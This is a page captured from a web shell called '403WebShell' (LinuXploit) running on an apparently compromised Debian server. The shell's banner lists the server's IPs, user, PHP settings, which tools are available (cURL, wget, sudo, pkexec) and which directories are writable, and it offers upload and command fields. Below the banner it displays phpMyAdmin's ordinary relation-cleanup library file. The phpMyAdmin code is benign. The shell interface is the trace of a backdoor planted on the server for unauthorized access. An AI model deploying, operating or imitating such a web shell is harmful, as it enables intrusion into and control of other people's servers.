Uname:Linux EDL-STRETCH 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

403WebShell
403Webshell
Server IP : 188.114.96.2  /  Your IP : 104.23.197.231
Web Server : Apache/2.4.59 (Debian)
System : Linux EDL-STRETCH 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
User : edlftp ( 1002)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/phpmyadmin_bak/libraries/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/phpmyadmin_bak/libraries/relation_cleanup.lib.php
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Set of functions used for cleaning up phpMyAdmin tables
 *
 * @package PhpMyAdmin
 */

/**
 * Cleanup column related relation stuff
 *
 * @param string $db     database name
 * @param string $table  table name
 * @param string $column column name
 *
 * @return void
 */
function PMA_relationsCleanupColumn($db, $table, $column)
{
    $cfgRelation = PMA_getRelationsParam();

    if ($cfgRelation['commwork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['column_info'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\''
            . ' AND table_name = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\''
            . ' AND column_name = \'' . $GLOBALS['dbi']->escapeString($column)
            . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['displaywork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['table_info'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\''
            . ' AND table_name = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\''
            . ' AND display_field = \'' . $GLOBALS['dbi']->escapeString($column)
            . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['relwork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['relation'])
            . ' WHERE master_db  = \'' . $GLOBALS['dbi']->escapeString($db)
            . '\''
            . ' AND master_table = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\''
            . ' AND master_field = \'' . $GLOBALS['dbi']->escapeString($column)
            . '\'';
        PMA_queryAsControlUser($remove_query);

        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['relation'])
            . ' WHERE foreign_db  = \'' . $GLOBALS['dbi']->escapeString($db)
            . '\''
            . ' AND foreign_table = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\''
            . ' AND foreign_field = \'' . $GLOBALS['dbi']->escapeString($column)
            . '\'';
        PMA_queryAsControlUser($remove_query);
    }
}

/**
 * Cleanup table related relation stuff
 *
 * @param string $db    database name
 * @param string $table table name
 *
 * @return void
 */
function PMA_relationsCleanupTable($db, $table)
{
    $cfgRelation = PMA_getRelationsParam();

    if ($cfgRelation['commwork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['column_info'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\''
            . ' AND table_name = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['displaywork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['table_info'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\''
            . ' AND table_name = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['pdfwork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['table_coords'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\''
            . ' AND table_name = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['relwork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['relation'])
            . ' WHERE master_db  = \'' . $GLOBALS['dbi']->escapeString($db)
            . '\''
            . ' AND master_table = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\'';
        PMA_queryAsControlUser($remove_query);

        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['relation'])
            . ' WHERE foreign_db  = \'' . $GLOBALS['dbi']->escapeString($db)
            . '\''
            . ' AND foreign_table = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['uiprefswork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['table_uiprefs'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\''
            . ' AND table_name = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['navwork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['navigationhiding'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\''
            . ' AND (table_name = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\''
            . ' OR (item_name = \'' . $GLOBALS['dbi']->escapeString($table)
            . '\''
            . ' AND item_type = \'table\'))';
        PMA_queryAsControlUser($remove_query);
    }
}

/**
 * Cleanup database related relation stuff
 *
 * @param string $db database name
 *
 * @return void
 */
function PMA_relationsCleanupDatabase($db)
{
    $cfgRelation = PMA_getRelationsParam();

    if ($cfgRelation['commwork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['column_info'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['bookmarkwork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['bookmark'])
            . ' WHERE dbase  = \'' . $GLOBALS['dbi']->escapeString($db) . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['displaywork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['table_info'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['pdfwork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['pdf_pages'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\'';
        PMA_queryAsControlUser($remove_query);

        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['table_coords'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['relwork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['relation'])
            . ' WHERE master_db  = \''
            . $GLOBALS['dbi']->escapeString($db) . '\'';
        PMA_queryAsControlUser($remove_query);

        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['relation'])
            . ' WHERE foreign_db  = \'' . $GLOBALS['dbi']->escapeString($db)
            . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['uiprefswork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['table_uiprefs'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['navwork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['navigationhiding'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['savedsearcheswork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['savedsearches'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\'';
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['centralcolumnswork']) {
        $remove_query = 'DELETE FROM '
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . '.' . PMA\libraries\Util::backquote($cfgRelation['central_columns'])
            . ' WHERE db_name  = \'' . $GLOBALS['dbi']->escapeString($db) . '\'';
        PMA_queryAsControlUser($remove_query);
    }
}

/**
 * Cleanup user related relation stuff
 *
 * @param string $username username
 *
 * @return void
 */
function PMA_relationsCleanupUser($username)
{
    $cfgRelation = PMA_getRelationsParam();

    if ($cfgRelation['bookmarkwork']) {
        $remove_query = "DELETE FROM "
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . "." . PMA\libraries\Util::backquote($cfgRelation['bookmark'])
            . " WHERE `user`  = '" . $GLOBALS['dbi']->escapeString($username)
            . "'";
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['historywork']) {
        $remove_query = "DELETE FROM "
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . "." . PMA\libraries\Util::backquote($cfgRelation['history'])
            . " WHERE `username`  = '" . $GLOBALS['dbi']->escapeString($username)
            . "'";
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['recentwork']) {
        $remove_query = "DELETE FROM "
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . "." . PMA\libraries\Util::backquote($cfgRelation['recent'])
            . " WHERE `username`  = '" . $GLOBALS['dbi']->escapeString($username)
            . "'";
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['favoritework']) {
        $remove_query = "DELETE FROM "
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . "." . PMA\libraries\Util::backquote($cfgRelation['favorite'])
            . " WHERE `username`  = '" . $GLOBALS['dbi']->escapeString($username)
            . "'";
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['uiprefswork']) {
        $remove_query = "DELETE FROM "
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . "." . PMA\libraries\Util::backquote($cfgRelation['table_uiprefs'])
            . " WHERE `username`  = '" . $GLOBALS['dbi']->escapeString($username)
            . "'";
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['userconfigwork']) {
        $remove_query = "DELETE FROM "
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . "." . PMA\libraries\Util::backquote($cfgRelation['userconfig'])
            . " WHERE `username`  = '" . $GLOBALS['dbi']->escapeString($username)
            . "'";
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['menuswork']) {
        $remove_query = "DELETE FROM "
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . "." . PMA\libraries\Util::backquote($cfgRelation['users'])
            . " WHERE `username`  = '" . $GLOBALS['dbi']->escapeString($username)
            . "'";
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['navwork']) {
        $remove_query = "DELETE FROM "
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . "." . PMA\libraries\Util::backquote($cfgRelation['navigationhiding'])
            . " WHERE `username`  = '" . $GLOBALS['dbi']->escapeString($username)
            . "'";
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['savedsearcheswork']) {
        $remove_query = "DELETE FROM "
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . "." . PMA\libraries\Util::backquote($cfgRelation['savedsearches'])
            . " WHERE `username`  = '" . $GLOBALS['dbi']->escapeString($username)
            . "'";
        PMA_queryAsControlUser($remove_query);
    }

    if ($cfgRelation['designersettingswork']) {
        $remove_query = "DELETE FROM "
            . PMA\libraries\Util::backquote($cfgRelation['db'])
            . "." . PMA\libraries\Util::backquote($cfgRelation['designer_settings'])
            . " WHERE `username`  = '" . $GLOBALS['dbi']->escapeString($username)
            . "'";
        PMA_queryAsControlUser($remove_query);
    }
}


Youez - 2016 - github.com/yon3zu
LinuXploit